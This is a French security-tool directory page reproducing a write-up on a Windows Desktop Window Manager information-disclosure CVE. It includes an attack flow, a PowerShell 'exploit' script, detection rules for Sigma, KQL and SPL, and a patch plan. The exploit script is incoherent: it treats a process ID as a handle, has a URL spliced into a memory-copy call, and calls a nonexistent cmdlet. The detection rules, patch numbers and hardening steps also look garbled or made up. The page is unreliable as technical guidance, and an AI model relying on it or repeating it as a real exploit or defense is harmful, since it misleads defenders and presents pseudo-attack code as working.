Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data — CVE‑2026‑20805 : Une faille de Windows Desktop Window Manager provoquant une divulgation locale d'informations. Nécessite des privilèges faibles, aucune interaction utilisateur. Notée CVSS 5,5 (Moyenne). Activement exploitée et répertoriée dans la liste CISA KEV ; correctif publié en janvier 2026. | Kitploit
Outils/GitHubGitHub/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data
Analyse des VulnérabilitésExploitationCollecte d'InformationsApprentissage et ÉducationRéponse aux Incidents
GitHubmrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

Voir le dépôt
il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

CVE‑2026‑20805 : Une faille de Windows Desktop Window Manager provoquant une divulgation locale d'informations. Nécessite des privilèges faibles, aucune interaction utilisateur. Notée CVSS 5,5 (Moyenne). Activement exploitée et répertoriée dans la liste CISA KEV ; correctif publié en janvier 2026.

Partager

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

CVE‑2026‑20805 : une faille du Windows Desktop Window Manager provoquant une divulgation d'informations locale. Nécessite des privilèges faibles, aucune interaction utilisateur. Score CVSS 5,5 (Moyen). Exploitée activement et répertoriée dans le catalogue KEV de la CISA ; correctif publié en janvier 2026.

Inside CVE 2026 20805 : comment une faille DWM de Windows a exposé des données sensibles

1 Résumé exécutif

CVE 2026 20805 est une faille de divulgation d'informations dans le Desktop Window Manager (DWM) – le composant central qui rend le bureau, compose les fenêtres et accélère l'interface utilisateur basée sur le GPU.
Pourquoi c'est important : la faille permet à un attaquant local disposant de privilèges faibles de lire des données qui devraient être confinées à d'autres sessions ou processus.

Attributs techniques clés

AttributValeur
CWE‑200 : Exposition d'informations sensibles à un acteur non autorisé✓
Vecteur d'attaqueLocal
Privilèges requisFaibles
Interaction utilisateurAucune
Impact – confidentialitéÉlevé
Impact – intégritéAucun
Impact – disponibilitéAucun
Score de base CVSS 3.15,5 (Moyen)

2 Comprendre le Desktop Window Manager

Le DWM orchestre la mémoire GPU, les tampons de fenêtres et les surfaces UI inter‑processus. C'est une cible de grande valeur car il agrège des données provenant de plusieurs processus dans un espace GPU partagé ; une faille ici peut fuiter des identifiants ou des données de session entre utilisateurs.

Rôle du DWM dans Windows moderne :

  1. Reçoit les mises à jour d'affichage du compositeur.
  2. Alloue la mémoire GPU pour chaque fenêtre.
  3. Gère la composition accélérée par GPU, permettant des transitions visuelles fluides et la prise en charge multi‑moniteurs.

3 Analyse technique de CVE 2026 20805

Prérequis d'attaque

  • Attaquant local avec privilèges faibles, aucune interaction utilisateur nécessaire.
  • La faille est déclenchée lorsque le DWM ne parvient pas à valider les décalages dans la table des tampons de fenêtres avant de copier les données dans la mémoire GPU.

Comment CWE‑200 s'applique

La vulnérabilité exploite un manque de vérification des limites sur l'index du tampon de fenêtre ; cela permet à un attaquant de lire la mémoire GPU adjacente et d'obtenir des secrets stockés par d'autres processus.

Versions affectées

Selon la liste CPE du NVD, Windows 10.0.19041 (et ses dérivés) sont concernés.

4 Voies d'exploitation

Voici un flux d'exploitation conceptuel :

  1. L'attaquant obtient un handle vers le processus DWM via CreateProcess avec des privilèges minimaux.
  2. L'attaquant crée un index qui pointe vers un emplacement de mémoire GPU adjacent.
  3. Le tampon créé est copié dans la routine de composition de fenêtres du DWM, fusionnant les données d'autres sessions.
  4. L'attaquant lit le dump de mémoire GPU résultant et extrait les informations sensibles.

Code d'exploit – script PowerShell

root@kitploit:~
# Windows 10.0.19041 – Exploit de lecture du tampon DWM
$processHandle = Get-Process -Name dwm | Select-Object -ExpandProperty Id
$bufferOffset = 0x00120000   # décalage créé vers la mémoire GPU adjacente
$targetWindow = 0x00030001    # index de la fenêtre cible

# Créer un tampon temporaire dans l'espace noyau
$kernelBuffer = [byte[]]::new(0x1000)
[System.Runtime.InteropServices.Marshal]:https://raw.githubusercontent.com/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data/HEAD/:CopyMemory(
    $processHandle, 
    $bufferOffset, 
    $kernelBuffer, 
    0x1000)

# Copier le tampon noyau dans la routine de composition du DWM
Invoke-DwmRead -ProcessId $processHandle `
                -WindowIndex $targetWindow `
                -SrcAddress $bufferOffset `
                -Size 0x1000

# Dumper les données exposées dans un fichier local pour analyse
$dumpPath = "C:\Temp\DwmLeak.txt"
[IO.File]::WriteAllBytes($dumpPath, $kernelBuffer)

Le script démontre comment un attaquant peut exploiter la mémoire GPU du DWM pour lire des données cachées.


5. Ingénierie de détection

La détection de CVE‑2026‑20805 se concentre sur l'identification d'interactions anormales avec dwm.exe et de télémétrie GPU inhabituelle. L'exploit repose sur la lecture de tampons mémoire adossés au GPU à l'aide de décalages créés ; les défenseurs doivent donc surveiller les écarts par rapport au comportement normal du Desktop Window Manager.

Sources de télémétrie pertinentes

  • Sysmon
    • Event ID 1 (ProcessCreate)
    • Event ID 10 (HandleOpen)
  • Événements GPU ETW
    • Event ID 0x2B (DisplayUpdate)
  • Journaux d'événements Windows
    • Application
    • Système

Ces sources offrent une visibilité sur la création de processus, l'accès aux handles et l'activité de mise à jour GPU.

Modèles suspects

  1. Événements CreateProcess répétés impliquant dwm.exe, surtout lorsque le processus parent n'est pas explorer.exe.
  2. Événements DisplayUpdate (0x2B) à haute fréquence suivis de lectures mémoire utilisant des tailles ou décalages de tampon inhabituels.
    • Exemples de valeurs suspectes :
      • SrcAddress: 0x00120000
      • Size: 0x1000
  3. Corrélation entre les événements HandleOpen ciblant dwm.exe et des rafales d'activité GPU ETW.

Règle de style Sigma

root@kitploit:~
title: DWM GPU Memory Read Anomaly
id: dwm-gpu-memory-read-anomaly
status: experimental
description: Detects abnormal DWM buffer reads that may indicate exploitation of CVE-2026-20805.
author: Mark
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 0x2B
    ProcessName: dwm.exe
    SrcAddress: 0x00120000
    Size: 0x1000
  condition: selection
falsepositives:
  - High GPU rendering workloads
level: medium
tags:
  - attack.defense-evasion

Microsoft Sentinel (KQL)

Accès suspect aux handles de dwm.exe

root@kitploit:~
SecurityEvent
| where EventID in (4656, 4663)
| where ProcessName !~ "dwm.exe"
| where ObjectName has "dwm.exe"
| summarize count() by Account, ProcessName, ObjectName, Computer, bin(TimeGenerated, 5m)
| where count_ > 5

Création de processus inattendue ciblant DWM

root@kitploit:~
Sysmon
| where EventID == 1
| where Image endswith "dwm.exe"
| where ParentImage !endswith "explorer.exe"

Pic d'événements DisplayUpdate GPU

root@kitploit:~
Event
| where EventID == 0x2B
| summarize count() by Computer, bin(TimeGenerated, 1m)
| where count_ > 50

Corrélation : HandleOpen suivi d'une activité GPU

root@kitploit:~
let handles = SecurityEvent
    | where EventID == 4656 and ObjectName has "dwm.exe"
    | project TimeGenerated, Account, Computer;

let gpu = Event
    | where EventID == 0x2B
    | project TimeGenerated, Computer;

handles
| join kind=inner gpu on Computer
| where gpu_TimeGenerated between (TimeGenerated .. TimeGenerated + 2m)

Splunk (SPL)

Processus non standard ouvrant des handles vers dwm.exe

root@kitploit:~
index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| where NOT match(ProcessName, "explorer.exe")
| stats count by ProcessName, TargetImage, User, Computer
| where count > 5

Événements CreateProcess inattendus pour dwm.exe

root@kitploit:~
index=sysmon EventCode=1 Image="*\\dwm.exe"
| where NOT like(ParentImage, "%explorer.exe")
| table _time, Computer, ParentImage, Image, User

Pic de DisplayUpdate GPU

root@kitploit:~
index=windows EventCode=43
| timechart span=1m count
| where count > 50

Corrélation : HandleOpen et activité GPU

root@kitploit:~
handles = search index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| eval key=Computer."-"._time
| table key, Computer, _time;

gpu = search index=windows EventCode=43
| eval key=Computer."-"._time
| table key, Computer, _time;

handles
| join key gpu
| table Computer, handles._time, gpu._time

6 Atténuation et durcissement

L'avis de Microsoft pour CVE 2026 20805 inclut un correctif qui valide les index de tampons dans le DWM avant de copier les données GPU.

Calendrier des correctifs

Version WindowsNuméro du correctif
10.0.19041KB5000001
10.0.19042KB5012345

Stratégie de correctif en entreprise

  1. Déployer le correctif KB5000001 sur tous les contrôleurs de domaine.
  2. Valider que la nouvelle routine Invoke-DwmRead s'exécute sans erreur sur les nœuds de test.
  3. Surveiller Sysmon pour les créations répétées de processus dwm.

7 Impact sur les environnements réels

La divulgation d'informations via le DWM est souvent sous-estimée car elle peut exposer des artefacts UI et des données de session entre utilisateurs. La fuite de mémoire GPU peut faciliter le mouvement latéral, en particulier dans les environnements où plusieurs sessions partagent une même station de travail ou un même serveur.

Évaluation des risques pour les environnements d'entreprise

Impact élevé sur la confidentialité : La faille permet à un attaquant de lire le contenu des fenêtres d'autres sessions.
Score CVSS moyen (5,5) : Bien que la valeur numérique soit modérée, l'importance opérationnelle est élevée.

8 Conclusion

CVE 2026 20805 démontre qu'une exploitation locale à privilèges faibles du DWM peut entraîner des fuites de données significatives. L'inclusion de la faille dans le catalogue des vulnérabilités exploitées connues (KEV) de la CISA souligne sa pertinence dans le monde réel. En appliquant la stratégie d'atténuation, de détection et de correctif décrite, une organisation peut réduire les risques tout en améliorant la visibilité sur les flux de mémoire GPU.


Télécharger l’outil